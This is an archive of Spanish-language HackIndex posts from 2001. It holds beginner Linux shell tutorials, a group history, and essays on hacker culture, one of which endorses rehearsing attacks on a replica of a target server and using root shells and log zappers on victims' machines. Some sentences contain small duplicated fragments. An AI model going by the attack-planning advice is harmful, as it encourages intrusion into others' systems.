A diferencia de lo que ocurre con otros sistemas operativos orientados a caracteres, casi todos los comandos básicos que acepta el shell, son externos, o sea, programas aparte, muchos de esos programas están en el directorio /bin y otros en el directorio /usr/bin Para verlos puede hacer un ls

[directorio]$ ls /bin
arch date grep mknod
rmdir true ash dd
gtar mktemp rpm umount
……………
[directorio]$ _

En cualquier momento, cuando se tenga curiosidad acerca de qué hace un programa determinado, podemos consultar la orden "man".

[directorio]$ man ls
——————————————-
LS(1) LS(1)
NOMBRE
ls, dir, vdir – listan los contenidos de directorios
SINOPSIS
ls [opciones] [fichero...]
Opciones de POSIX: [-CFRacdilqrtu1]
Opciones de GNU (en la forma más corta):
[-1abcdfgiklmnopqrstuxABCDFGLNQRSUX]
[-w cols] [-T cols]
[-I patrón]
[--full-time] [--format={long,verbose,commas,across,vertical,single-column}]
[--sort={none,time,size,extension}]
[--time={atime,access,use,ctime,status}]
[--color[={none,auto,always}]]
[--help] [--version] [--]
DESCRIPCIÓN
El programa ls lista primero sus argumentos no directorios:
————————————————

Con las teclas de cursor, nos desplazamos hacia arriba y abajo, para salir pulsar la tecla q. La mayoría de las órdenes aceptan parámetros, los parámetros especifican que cosas debe hacer un programa o como debe funcionar.

[directorio]$ cd .. ; ls -l
drwxr-xr-x 5 genaro users 1024 Jan 13 00:22 directorio
[genaro]$ _

TIP 3: Los parámetros en Unix se pasan con el simbolo "-", a diferencia del DOS que usa el símbolo "/".

Con el parámetro -l, hemos dicho a ls que liste los ficheros en formato largo, un fichero por línea, dando más información sobre ese fichero. Probad a hacer:

[genaro]$ ls -l /usr/bin
-rwxr-xr-x 1 root root 20648 Jul 30 1999 zipsplit
-rwxr-xr-x 1 root root 41 Mar 25 1999 zless
-rwxr-xr-x 1 root root 1068 Mar 25 1999 zmore
-rwxr-xr-x 1 root root 3502 Mar 25 1999 znew
[genaro]$ _

Veremos desplazarse los ficheros rápidamente y se perderán los primeros, este es el momento para prácticar las combinaciónes de teclas "Mays + Re Pag" y "Mays + Av Pag". Al principio de cada línea, hay una información muy rara, -rwxr-xr-x, la primera letra, indica que tipo de fichero es, si es una "d" es un directorio, y si es el caracter "-" es un fichero ordinario, o sea, un programa, un fichero de texto, un fichero de sonido, un AVI, etc. Si volvemos a hacer un ls -l, vemos que efectivamente, el fichero "directorio" que hemos creado con anterioridad, es un directorio.

[genaro]$ ls -l
drwxr-xr-x 5 genaro users 1024 Jan 13 00:22 directorio
[genaro]$ _

Vemos en la tercera columna, la palabra "genaro", o sea, dice que lo hemos creado nosotros, y como pertenecemos al grupo de trabajo "users", el fichero también pertenece al grupo "users". La siguiente columna, 1024, indica el tamaño del fichero, observa el listado de /usr/bin. luego viene la fecha y la hora, y por último el nombre del fichero. Pero volvamos a la primera columna.

-rwxr-xr-x 1 root root 3502 Mar 25 1999 znew

Sobre el fichero órdinario znew, hay unos permisos de lectura y escritura, vemos que el fichero, pertenece a "root" y es de un grupo de usuarios llamado "root". Quitamos el primer caracter, que nos dice que tipo de fichero es, y separamos los demás caracteres en bloques de tres.

rwx r-x r-x

El primer bloque, se aplica sobre el usuario propietario, en este caso "root", el segundo bloque sobre el grupo propietario, también "root" y el último bloque, a todos los demas. El propietario del fichero, "root", puede leer "r" , puede escribir en el "w", incluido el borrado, y puede ejecutarlo como programa, "x". En nuestro caso, como no somos "root" y somos de otro grupo, "users", se aplica el tercer bloque, podemos leer el fichero, y podemos ejecutarlo, pero no podemos sobrescribirlo, ni borrarlo, ni hacer ninguna modificación. Esto es una seguridad básica del sistema operativo, en una máquina en la que existan varios usuarios trabajando al mismo tiempo, ninguno podrá modificar los programas ni los ficheros para meter troyanos ni bromas. Supongamos que alguien escribiera un virus para Linux, y lo ejecutamos trabajando como "genaro", el virus tendría nuestros permisos y no podría borrar los ficheros importantes.

[genaro]$ ls -l /etc/shadow
-r——– 1 root root 745 Dec 22 02:01 /etc/shadow

El fichero /etc/shadow, contiene los passwords de los usuarios, y sólo lo puede leer el usuario "root". Otro parámetro de ls, es el parámetro -a, con -a listamos también los ficheros ocultos

[genaro]$ ls -a . .gftp
.twmX8Fmri .. .gimp
.user.rdb Directorio
[genaro]$_

Hay más ficheros ocultos, pero se han omitido por comodidad, los ficheros ocultos en Unix son los que empiezan con un punto, normalmente suelen ser ficheros de configuración. De esos ficheros, hay dos, el fichero "." y el fichero ".." que son directorios, "." es el directorio en el que estamos y ".." es el nivel superior, o directorio padre.

TIP 4: Cuando usamos más de un parámetro, normalmente se pueden agrupar con un único simbolo "-"

[genaro]$ ls -alF

Siguiendo con el tema de los parámetros, el shell del sistema operativo, no mete a los programas los parámetros tal y como nosotros se los damos, tiene que mirar si existen unos caracteres especiales llamados metacaracteres. Un metacaracter, es el símbolo "*", cuando pasamos un asterisco como parámetro a un programa, el sistema operativo lo sustituye por los nombres de todos los ficheros que existen en el directorio.

[genaro]$ cd directorio
[directorio]$ touch fichero1
[directorio]$ touch fichero2
[directorio]$ cd ..
[genaro]$ mkdir dir2
[genaro]$ touch fichero3
[genaro]$ touch fichero4
[genaro]$ touch fichero5
[genaro] ls *
fichero3 fichero4 fichero5
directorio:
fichero1 fichero2
dir2:
[genaro]$ _

La órden ls * en nuestro caso, equivalía a "ls directorio dir2 fichero3 fichero4 fichero5". El caracter asterisco, naturalmente también se puede usar como comodín de varios caracteres.

[genaro]$ ls *.txt

Otro metacaracter es el símbolo "?" que sustituye a un caracter.

[genaro]$ ls fichero?
fichero3 fichero4 fichero5

Para más información se puede consultar "man bash". La semana que viene, Mario Brosh

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

Introducción

Lecter — Fri, 15 Jun 2001 22:06:06 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: Introducción
Autor: Lecter
Tema: HackIndex: El Proyecto

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

Hola, estudiantes.

Este pequeño documento pretende ser un prolegómeno a la iniciativa de NBK y mía también para abrir una especie de “seminarios sobre hacking”. Ya sé que la mayoría de los que estais comenzando lo que quereis es conocimiento práctico, una especie de vademecum empírico sobre cómo introducirse en lugares vedados, mirar y actuar en ellos y marchar sin dejar huellas, de cómo enmascararnos y anonimizarnos, de cómo desproteger sistemas y programas y traspasar los límites establecidos. Eso es una característica fundamental del wannabe que se manifiesta por un consiguwannabe que se manifiesta por un consiguiente estado larval donde se devora todo aquello relacionado con el “hacking” y que viene impulsado por el ímpetu de la juventud (juventud entendida como el ánimo de “comerse el mundo” “no limits”) y evidentemente por el acervo de nuestros conocimientos. Hay una diferencia fundamental entre el wannabe y el lammer; el primero considera el hacking como un fin en sí mismo y le preocupa la instrucción, el segundo lo emplea como un medio para conseguir …¿poder sobre los otros?

Como siempre, el hacking es neutro, es como la flor con la que la abeja prepara la miel y la araña su veneno…depende de quien lo emplee. No seré yo quien os dé sermones acerca de la conciencia del hacker ni de la ética fundamental. Eso no sirve. Pero sí quiero deciros que para llegar a buen puerto es necesaria una cierta preparación. El que no tenga unas ideas claras acerca de los fundamentos de los microprocesadores y funcionamiento de sistemas operativos debería ponerse a estudiar en seguida. Conocer vuestro hardware al dedillo, desde la placa base al último periférico…

Y para empezar yo os recomendaría elegir como sistema operativo algún (mal llamado) “clon” de Unix, como Linux o FreeBSD. Conseguir un aroma de Linux es muy fácil hoy: desde descargarlo por la red hasta encontrarlo en muchas de las revistas sobre informática que pululan por los quioscos (PCWorld, PCActual…Sólo Programadores Linux, Sólo Linux, Linux Actu Sólo Linux, Linux Actual)…y por supuesto también podeis comprarlo porque son realmente baratos . De este modo dispondreis de clientes y servidores para muchos servicios (FTP, correo, web) y dispondreis de muchas utilidades para estudiar la seguridad del sistema (primero el vuestro). Dispondreis de la posibilidad de controlar bien vuestros puertos/servicios (TCP Wrappers, ipchains), establecer cortafuegos/proxies, enmascarar vuestra IP…y tendreis muchos sistemas para “mirar” y “ver a quien os mire” como nmap, SATAn, SAINT, …

Además podreis usar multitud de lenguajes de programación (FreePascal, C/C++, XBasic, Fortran, Lisp, Perl, Python, Java, Tcl/Tk…) que no os costarán ni un duro (aunque los comerciales de Windows tampoco, si empleais el lado oscuro de la fuerza). Además, Linux convive sin problemas con Windows. En cuanto a la edición de textos, el sistema tex/latex/pdflatex permite la elaboración de documentos de excelente calidad. Los “lenguajes de marcas” como el sgml/DockBook, xml que utilizan la filosofía del parsing de un DTD (Definición tipo documento) permiten pasar el texto a cualquier formato (rtf, html, latex…).

Una vez que os encontreis a gusto en linux, deberíais profundizar en algún lenguaje de programación. Eric Raymond sugiere comenzar con HTML, pero es conveniente, perl, Python o C y para el trasiego de internet Java (o emplear cgis escritos en Perl o C). Yo soy ya un pureta (comencé coya un pureta (comencé con el Fortran IV cuando había que hacer el debugging con las tarjetas perforadas) y se me nota el anquilosamiento, pero no me importa deciros que si es posible huyais de los “front-ends”, de los gestores que hacen casi todo por tí. Yo sé que cuesta bastante hacerse una páguna web “a mano” escribiendo el código HTML (coen el editor vi o emacs, encima) que escogiendo un asistente para la creación de páginas web. También es más fácil usar lyx para crear tus documentos latex, tex o pdf, que escribir a mano los macros de tex (latex)…pero entonces habrás aprendido a usar el código. Si puedes lee mucho código. Aprende primero algo sencillo como la programación en shell (bash por ejemplo), y escribe tus propios guiones…muchos ataques se basan en troyanos basados en shellscripts. Después te será muy fácil pasar a Perl… y te darás cuenta que cada lenguaje que aprendas te proporcionará una visión diferente pero complementaria de las posibilidades que tienes frente al sistema.

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

Nuestra historia

AHE — Fri, 15 Jun 2001 22:05:06 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: Nuestra historia
Autor: AHE
Tema: HackIndex: El Proyecto

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

A.H.E. (Alea Hackta Est) es un grupo de Seguridad Informática dedicado fundamentalmente a proyectos educativos relacionados con seguridad en redes y sistemas informáticos y hacking ético en general.

Nuestra intención es aprender todo lo que se pueda, y de paso enseñar, o al menos ayudar a los demás a aprender acerca de estos temas, huyendo, en general, del oscurantismo en informática y de la figura del hacker como delincuente o como ser omnipotente y omnisciente en informática.

Ahora, contando un poco mas de historia:

El grupo surgió de la USENET, del foro es.comp.hackers. En este grupo, que a lo largo de su historia ha pasado por momentos donde ha habido conversaciones de gran nivel y otros momentos donde ha sido imposible encontrar nada más que publicidad, provocaciones, preguntas de cómo desproteger algún programa comercial, cómo hackear un correo de hotmail, etc… y mensajes similares, muy distintos a lo que debería ser el contenido del grupo, vivía al comienzo del año 2000 uno de sus momentos álgidos.

En él se reunía habitualmente un grupo de gente diversa, algunos con un alto nivel técnico, como Drizzt, Agustín MuNoz, NBK, Lecter, David Martínez, Lokutus, CrinO o Spinnet, otros que estaban empezando, como [OMG], Isocrono o Seldon, además de otros habituales de las conversaciones del grupo, como Santiago (milon), Haste, Vladimir y otros muchos…

A raíz de las muchos mensajes de alto nivel técnico que había en el grupo, se inició un hilo de mensajes bajo el título de FOR YOUR EYES ONLY en el que se quiso iniciar un proyecto de hacking hispano con la intención de servir de guía básica a los novatos en el tema del hacking y de perfeccionamiento para el hacker, por lo que debería iniciarse desde los niveles más básicos, y seguir hasta alcanzar los conocimientos más avanzados en esta especie de Macro-curso: El proyecto HackIndex. En ese hilo de mensajes se hicieron muchas propuestas sobre las líneas que debería seguir el proyecto HackIndex, y fueron recogidas en un listado llamado Temas en desarrollo. A partir de entonces empezaron a llegar artículos, y NBK los recogió en su página web http://nbk.hackindex.org, y [OMG] y CrinO a su vez los recogieron en las suyas, http://members.es.tripod.de/omg/ y http://crino.hackindex.org respectivamente, que se pueden considerar como las primeras web de HackIndex.

Con el tiempo, la situación del grupo fue empeorando. Junto a los mensajes relacionados con el hacking, que cada vez eran más, también aumentaban los mensajes de provocadores, spammers, pidones, etc… hasta tal punto que resultaba casi imposible encontrar los mensajes interesantes entre tanta basura. Por eso, y copiando el método seguido por otros habitantes del grupo en épocas pasadas, se marcaron los mensajes relacionados con el tema del grupo con la etiqueta [OnTopic] para designar que el mensaje estaba dentro del tema del grupo, y la inicial de la temática. Así por ejemplo, la etiqueta [H][OnTopic] designaba los mensajes con el tema hacking de interés dentro de la temática del grupo.

Sin embargo, la situación siguió empeorando, hasta el punto de tener que descargar más de 200 mensajes diarios para luego encontrar no más de 10 de interés para un hacker o un futuro hacker. Así las cosas, NBK creó la lista HackIndex el día 8 de Agosto de 2000, una lista moderada para evitar los abusos de que era víctima el grupo es.comp.hackers. El objetivo de esta lista era lograr que fuera lo que hubiéramos querido que fuera es.comp.hackers, objetivo que creemos que se ha cumplido.

A los pocos días de creada la lista, y ante el crecimiento que estaba teniendo, ya que en los primeros días se subscribieron más de 100 personas, se sumó a la moderación Seldon, y hasta este momento el dúo NBK-Seldon ha sido el moderador de la lista. En esos primeros días de la lista se puede considerar que nació AHE como grupo. Estaba formado en un principio por quienes intervenían en las conversaciones de es.comp.hackers y decidieron mudarse a la lista desde el primer momento. Estaba compuesto exclusivamente por españoles, a pesar de ser cada vez más los hispanos de otros lugares, sobre todo argentinos, los que formaban parte de la lista. También se creó la primera web oficial del grupo, http://go.to/hackindex, hospedada en un servidor gratuito y basada en el diseño de las páginas de NBK y CrinO. Cuando más tarde se pensó en actualizar el diseño, y además surgió la posibilidad, gracias a NBK, de hospedarla en un servidor administrado por nosotros, se produjo la primera ampliación de AHE, para acometer la tarea de crear la nueva página, que finalmente fue diseñada por Pistone, y alojada en el dominio http://www.hackindex.org

El día 24 de Marzo de 2001 se creó CrackIndex, dedicada a la ingeniería inversa y a la programación en ensamblador, con el objetivo de servir de punto de reunión común para todos los grupos de cracking hispano, ya que el número de mensajes de HackIndex de temática hacking cohibían a quienes podían enviar los de temática cracking, y por el mismo motivo de la imposibilidad de intercambiar y transmitir conocimientos de esta rama en es.comp.cracks y foros similares. A pesar de arrastrar el calificativo de “hermana pequeña de HackIndex”, lo cierto es que es una lista de gran nivel en la que se ha reunido gente muy importante de la escena hispana, y donde están representados con uno o varios miembros todos los grupos de cracking hispanos.

La lista CrackIndex está moderada por Marmota, y es sin duda gracias a su esfuerzo por lo que CrackIndex ha superado todas las previsiones de participación y calidad, y puede considerarse que, a pesar de contar con bastantes menos miembros y mensajes, la calidad de esta lista es superior, o al menos igual, que la de HackIndex.

Y bueno… el grupo…”somos todos los que estamos pero no estamos todos los que son” como se suele decir. En A.H.E hay gente que ha salido y otra que ha entrado, formado por gente de varios países, lo cual nos alegra mucho y nos enriquece. A.H.E no es un grupo cerrado, sino que aceptamos a cualquiera que quiera formar parte de él, con la condición de aportar algo como un artículo o un programa, y el compromiso de seguir haciéndolo en el futuro. Somos un grupo muy heterogéneo, en cuanto a edades, experiencia, profesiones, etc… Pero tenemos un denominador común: La pasión por la informática en todas sus ramas.

Y ya concluyendo, tenemos varios proyectos para el futuro, otros ya en desarrollo y el objetivo de llenar la página con ellos de una vez… pero cada uno tiene una vida privada y no podemos dedicar más que nuestro tiempo libre al proyecto, y por desgracia la inmensa mayoría del grupo no disfruta apenas de tiempo libre, por lo cual vamos despacio…. despacio pero constante, nos queda mucha guerra que dar aun.

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

La pantalla negra I

Lokutus — Fri, 15 Jun 2001 22:04:54 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: La pantalla negra I
Autor: Lokutus
Tema: Linux

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

Requerimientos:
Un Linux instalado funcionando con una cuenta de usuario, que se compone de un Login (nombre), y un password (contraseña), Ese Linux debe de arrancar en modo consola, sin las X. Es aconsejable que sea una versión castellanizada con las páginas del manual del proyecto Lucas.

Encendemos el ordenador, apretando a ese botón que pone Power, el sistema operativo arranca, y al cabo de un rato veremos la pantalla de color negro y un mensaje similar a:

Linux Debian (Potatoe)
Login:

¿No ve nada?, compruebe si el pilotito del monitor está encendido, si no es así, pulse el botón gordo. ¿Problema subsanado?, bien empezamos.

Escribimos el login, cada vez que pulsamos una tecla, aparecerá en pantalla el caracter correspondiente,

Linux Debian (Potatoe)
Login: genaro

Y ahora, ¿Como decimos que hemos acabado de introducir el nombre?, con la tecla "Intro" que está en el teclado numérico, el de la derecha, debajo de la tecla "+". Un equivalente a este tecla es la tecla gorda que tiene una flecha en forma de L apuntando a la izquierda, la que está justo encima de la tecla de mayúsculas izquierda. Esta tecla también se llama retorno de carro, o CR de "Carriage Return".

Despues de introducir el login, nos pide el password.

Linux Debian (Potatoe)
Login: genaro
password:

Es este caso, no veremos los caracteres que tecleamos, si nos confundimos en el password o en el login, no nos dirá en que nos hemos confundido y tendremos que teclear las dos cosas.

¿Ya hemos entrado?, bien podemos comenzar. En primer lugar y si nunca ha tenido contacto con un interfaz en modo consola, Linux es como un chat o IRC, pero en lugar de hablar con otras personas que están conectadas al IRC, hablamos con el sistema operativo.

Observamos que en la pantalla, sólo vemos un mensaje y un cursor parpadeante:

[genaro]$ _

Ese mensajito, es el llamado "prompt", traducido como simbolo del sistema, y quiere decir, que el sistema operativo, está preparado y listo para aceptar órdenes, o sea, escribimos algo, pulsamos retorno de carro y el sistema operativo, nos responde, y vuelve a aparecer el shell para que podamos decir más cosas.

Si pulsamos varias veces la tecla de retorno de carro sin decir nada, se escribe más veces el símbolo del sistema.

[genaro]$
[genaro]$
[genaro]$
[genaro]$
[genaro]$ _

Comenzamos a trabajar.
[Siempre pulsamos retorno de carro para acabar una órden]

[genaro]$ naz, que pasa tronco?
bash: naz,:
command not found

Parece que no nos ha hecho mucho caso, lo mismo hay que hablarle en giri.

[genaro]$ hello, what’s the matter?
bash: hello:
command not found

¿Qué es lo que pasa?, que el sistema operativo no es un sistema experto, no podemos hablar con el como si fuera otra persona, tenemos que introducirle órdenes, el se las traga, hace lo que tenga que hacer y escribe en pantalla los resultados.

Vamos a comenzar con una primera órden. "clear".

[genaro]$ CLEAR
bash: CLEAR:
command not found

Ops, parece que no funciona, ¿por qué?, ¿tiene que ser en minúsculas?, pues si.

[genaro]$ clear

Y la pantalla se nos limpia, de todas formas si pulsamos la combinación de teclas Control + L, se nos limpia la pantalla también.

TIP 1: Linux distingue las mayúsculas de las minúsculas

La siguiente órden, "ls", lista el contenido de un directorio, un directorio es el equivalente a una carpeta de trabajo, como las que tenemos en Windows, solo que no la vemos en una ventana. "ls" viene de la contracción de la palabra inglesa "list", en castellano "LiStar".

[genaro]$ ls
[genaro]$ _

¿Qué ha pasado?, ¿no ha funcionado?, por lo visto no hay ningún fichero en la carpeta en la que estamos y por lo tanto no ha devuelto nada.

TIP 2: Cuando Linux no tiene nada que decir, no dice nada.

Si no tenemos ficheros, pues nos lo hacemos, vamos a empezar por otra carpeta.

[genaro]$ mkdir mi carpeta
[genaro]$

Y vamos a ver si la ha creado.

[genaro]$ ls
carpeta mi
[genaro]$

Opssss, ¿ha puesto el nombre del directorio al reves?, no, resulta que ha creado dos directorios, un directorio "mi" y un directorio "carpeta", vamos a intentarlo de otra forma:

[genaro]$ mkdir "mi carpeta"
[genaro]$ ls
carpeta mi mi carpeta
[genaro]_

dabuten, si queremos cambiar de directorio, usamos la órden "cd".

[genaro]$ cd
carpeta
[carpeta]$ _

Observamos, que el prompt ha cambiado, indicando el directorio en el que estamos, en cualquier momento podemos hallar el directorio en el cual estamos situados usando la órden pwd.

[carpeta]$ pwd
/home/genaro/carpeta
[carpeta]$ _

El mensaje que nos ha respondido quiere decir, que estamos en el directorio carpeta, que está dentro del directorio genaro que a su vez está en el directorio home. Linux, al igual que todos los Unix, utiliza para separar los directorios el símbolo correcto, o sea el "/", ‘backslack’, de hecho es el que se utiliza en los URL de internet.

El directorio más alto de todos, es el directorio "/", llamado directorio raiz, un directorio, puede contener varios directorios, llamados subdirectorios, o directorios hijos, pero un directorio hijo, o subdirectorio, no puede contener varios directorios padres. Para subir en la jerarquía de directorios, podemos teclear.

[carpeta] cd ..
[genaro] _

Los dos puntitos separados del cd, pues de lo contrario, no se reconocerá la órden. También podíamos haber dado el camino completo, veamos como:

[genaro] cd -
[carpeta] cd /home/genaro
[genaro] _

La primera órden cd -, vuelve al anterior directorio en el que hayamos estado, y con la segúnda órden, indicamos el camino completo. También se puede indicar un camino relativo, veamos como.

[genaro] cd -
[carpeta] cd ../mi
[mi] cd ../../genaro
[genaro] cd mi
[mi] _

El directorio "mi", está a la misma altura que el directorio "carpeta", ambos cuelgan del directorio "genaro", asi que vamos al directorio "mi" dando como referencia el directorio padre, (los dos puntos), "../mi". Estando en el directorio "mi", la órden "cd ../../genaro" es equivalente a "cd ..", simplemente hemos dado un rodeo. Voy a introducir en este punto una órden, la órden es "touch", sirve para crear un fichero si no existe.

[mi]$ touch fichero1
[mi]$ ls
fichero1

Hemos creado un fichero llamado "fichero1", este fichero estará vacío, no contiene nada. Vamos al directorio padre, y vamos con lo último que nos queda de los directorios, el borrado de estos. El borrado de directorios se hace con "rmdir".

[mi]$ cd ..
[genaro]$ ls
carpeta mi mi carpeta
[genaro]$ rmdir carpeta
[genaro]$ ls
mi mi carpeta
[genaro]$ rmdir "mi carpeta"
[genaro]$ ls
mi
[genaro]$ rmdir mi
rmdir: mi: Directory not empty
[genaro] _

No podemos borrar el directorio "mi", por que hemos creado antes el fichero "fichero1". tenemos que entrar en ese directorio, borrar el fichero, volver y borrar el directorio. Para borrar ficheros, usamos la órden "rm".

[genaro]$ cd mi
[mi]$ rm fichero1
[mi]$ ls
[mi]$ cd ..
[genaro]$ rmdir mi
[genaro]$ ls
[genaro]$ _

Ya está, hay otra forma de borrar directorios que no están vacios, es con la órden "rm -r", la r de recursivo. Para salir de una sesión abierta de Linux, se usa la órden exit.

[genaro]$ exit
Linux Debian (Potatoe)
Login:

Y volveremos a ver el login inicial. De momento y como no sabemos parar un sistema Linux, para pararlo usamos la combinación de teclas "Control + Alt + Delete", cuando esté el ordenador a punto de arrancar otra vez, lo para pulsando el botón de power.

Resumen: hasta ahora hemos visto:

Entrar y salir en una sesión.

Qué es esa pantalla negra.

Crear y borrar directorios.

Moverse entre directorios.

Qué fichero hay en cada directorio.

Borrar ficheros.

Próxima sesión, más de lo mismo.

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

¿Se puede hackear desde Windows?

Lokutus — Fri, 15 Jun 2001 22:03:18 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: ¿Se puede hackear desde Windows?
Autor: Lokutus
Tema: Windows

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

¿SE PUEDE HACKEAR DESDE WINDOWS?
——————————–

A veces, y leyendo las news o algún foro desde la web, uno se encuentra afirmaciones tales como, “No se puede hacer hacking desde Windows”, “para ser hacker tienes que tener linux, si no eres un lamer”

Aclaremos un primer punto, ¿qué es un hacker?, existen casi tantas definiciones como personas existen.

Si nos vamos al lexicon, o leemos el artículo de Richard Stalmand acerca de “como ser un hacker”, observamos que según algunos circulos, ser hacker no consiste en romper la seguridad de sistemas informáticos, si no en resolver problemas, desarrollar software libre, hacer traducciones, soporte gratuito en las news y en el IRC ayudando a los que tienen problemas, e incluso hacer trabajos menos reconocidos como moderar grupos de noticias o listas de correo.

Bajo ese punto de vista, es obvio que se puede desarrollar software libre para cualquier sistema operativo, ya sea Windows, BeOS, Linux o BSD en cualquiera de sus variantes. Y desde ese punto de vista, es probable que existan más hackers en “es.comp.linux.misc” que en “es.comp.hackers”.

A menudo leyendo documentaciones o escritos procedentes del mundo del software libre, encuentro la palabra “hackear”, a veces esa palabra la traduzco como “desarrollar”, y otras veces como “hacer ingeniería inversa” o “aprender todo acerca del funcionamiento del software XXX”.

Por ejemplo, cuando alguien intenta hallar el formato de un tipo de documento, o gráficos que no está documentado, o un protocolo, está hackeando. Los que programaron el software para ver DVD en linux, hackearon el sistema de encriptación del DVD.

Naturalmente, Windows es una plataforma más cerrada sobre la que tienes menos información, y hay cosas que desearía desarrollar pero que no puedo hacerlas por carecer de información técnica. Sin embargo en Linux hay toda la información que necesito.

Si nos centramos en el otro significado de la palabra “hacker”, invadir sistemas informáticos ajenos, o al menos ser capaz de hacerlo. También se puede hacer desde Windows. Nuevamente, es posible que inicialmente carezcamos de Herramientas, pero poco a poco podemos conseguirlas.

Por otro lado, muchas herramientas no se van a ejecutar en la máquina del “hacker” si no en la máquina destino, como los root shell, los zapper, etc.

A veces en la máquina “victima” no dispondrá de compilador, y necesitaremos compilar en nuestra propia máquina las “herramientas”, pero, ¿y si tienes linux y la máquina destino es un Solaris?, ¿y si una vez escarmentado, te has instalado solaris y la máquina de destino es un BSD en plataforma Power PC?, por muchos sistemas operativos que tengamos instalados siempre nos encontraremos con el problema de no poder compilar una herramienta.

Un hacker, según muchas definiciones, es ante todo un forofo de la informática, alguien que siempre está liado con ordenadores, y en mi opinión un forofo lo mismo que en un momento dado trastea con Linux, en el momento siguiente está trasteando con Windows 2000, y en el siguiente con BSD.

¿Visteis la película “RAMBO” cuando dice, “yo he pilotado tanques, helicopteros, y he manejado todo tipo de armas”?, pues es un poco, como ser un “RAMBO” pero de la informática, ser capaz de pilotar cualquier sistema operativo que le pongan por delante, poder meterse con cualquier lenguaje de programación, o al menos aprenderlo en poco tiempo.

Si, si, ya se que el que mucho abarca poco aprieta, pero el que tiene los conceptos bien claros, puede abarcar mucho, un desarrollador de software experto, cuando piensa en una arquitectura de software, le importa tres carajos en qué lenguaje de programación se va a desarrollar. A ningún programador de verdad, le asusta meterse de repente en Modula 2 cuando siempre ha programado en C, por ejemplo.

De la misma forma, meterse de repente con Open VMS, o con MVS no debería asustar a nadie si tiene los conceptos claros acerca de qué es un sistema operativo y como funciona. Al principio tendrá que ler mucho y hacerse chuletas, pero en un par de semanas como el que más.

En mi opinión, e independientemente del concepto de “hacker” que tengamos, puede ser util montarse un laboratorio “hacker” en casa, siempre y cuando sea posible.

Para empezar, aunque no imprescindible, pero si muy, muy aconsejable, disponer de varios ordenadores, yo en casa tengo siete ordenadores, pero si vivis con vuestros padres o estais casados no es aconsejable tener tantos, puesto que podeis tener problemas familiares, y puede que os envien a una terapia de grupo.

Un segundo o tercer ordenador, lo podeis conseguir de segunda mano bastante baratos, por ejemplo los que vivais en Madrid, podeis conseguir un Pentium 90 – 100 por unas 20.000.

Lo que llevais un tiempo usando ordenadores y sabeis algo de hartware, es muy probable que cada cierto tiempo actualizais vuestro ordenador, le cambiais la placa base, la tarjeta de video, y poco a poco, os encontrais con que teneis el ordenador original que teníais en piezas sueltas, en ese caso, sólo os falta compraros una caja minitorre para tener un segundo o tercer PC.

El segundo paso es instalaros una pequeña red local en vuestra casa, las tarjetas de red actualmente están tiradas de precio, por unas 2000 pesetas podeis conseguirlas. Un Hub de 4 puertos tampoco vale tanto, aunque os lo podeis ahorrar si adquiris tarjetas con conectores de varios tipos y os instalais la red con cableado coaxial.

Tambien os podeis ahorrar la compra de varios monitores con un conmutador de pantalla-teclado-raton, hay dos tipos de este dispositivo, los más baratos, son una vulgar caja con un conmutador de galleta dentro, eso suele dar problemas al conmutar, por ejemplo que el teclado deje de funcionar y tengais que rearrancar un ordenador. A veces por culpa de los falsos contactos, se os puede poner el monitor de color verde, o azul.

Los digitales, cuestan algo más de dinero, pero merecen la pena.

Usando varios ordenadores, podeis instalaros varios sistemas operativos, Windows, Linux, BSD, servidores web.

Si os va el hacking de guante blanco, podeis usar vuestra red casera para probar aplicaciones cliente servidor,

Si os va el lado oscuro de la fuerza, podeis usar vuestra red casera para replicar en una de vuestras máquinas un servidor que querais atacar, (las mismas versiones de todo), y probar a atacar vuestro propio servidor, cuando consigais entrar, lo intentais con el servidor que habeis replicado de tal forma que vais directamente al grano.

E incluso si solo intentais aprender acerca de seguridad informática, podeis intentar atacar un servidor vuestro, y desde el servidor observar en qué notais el ataque.

Por ejemplo, he observado que en un Linux, sin ninguna herramienta de seguridad, son más invisibles los escaneos de puerto de tipo full que los invisibles de tipo “sync”, por que algunos software de servidor, cuando reciben una trama “sync”, envían un mensaje de error al fichero de trazas.

Por otro lado, muchos, muchísimos bugs de seguridad, surgen para plataformas Windows, de tal forma que, ¿es posible detectar un bug en Windows si solo usas linux?, pues no. De hecho algo de lo que estoy convencido, es que muchos bugs de seguridad que aparecen tanto para Windows como para Linux, no han sido descubiertos por grupos de hackers, si no por administradores de sistemas, que los trabajan dia a dia o por empresas de seguridad informática.

Resumen: ¿Es “vergonzoso” usar OutLook para enviar a las news?, cada cual usa lo que quiere o le apetece, a veces uso OutLook desde Windows y a veces netscape desde Linux, depende de lo que esté haciendo,

Si envio mensajes desde Windows, o bien estoy en el trabajo, o bien estoy desarrollando algo en VC++. O estoy asimilando un virus. Si envío algo desde Linux, o bien estoy en el IRC, o bien estoy haciendo un simulador de troyanos en GTK efilon plan experimental.

No related posts.

Related posts brought to you by Yet Another Related Posts Plugin.

¿Qué es un hacker? Filosofía hacker

NBK — Fri, 15 Jun 2001 22:02:03 +0000

#####################################
## HACKINDEX ##
## http://www.hackindex.org ##
#####################################
Titulo: ¿Qué es un hacker? Filosofía hacker
Autor: NBK
Tema: Conceptos Hackhetics

La información incluída en este documento es expuesta en base a un interés educativo. HackIndex no se hace responsable del uso de dicha información.

Inspirado en “How to become a Hacker”, de Eric S.Raymond

Para quien no haya oido hablar de Eric S.Raymond, uno de los gurus de la “vieja guardia”, es editor del “Jargon” (La Jerga) y creador y fomentador de numerosos proyectos, muchos de ellos en la red, para los interesados podeis visitar el Mapa de la Web de Eric y daros una vuelta por su extenso site.

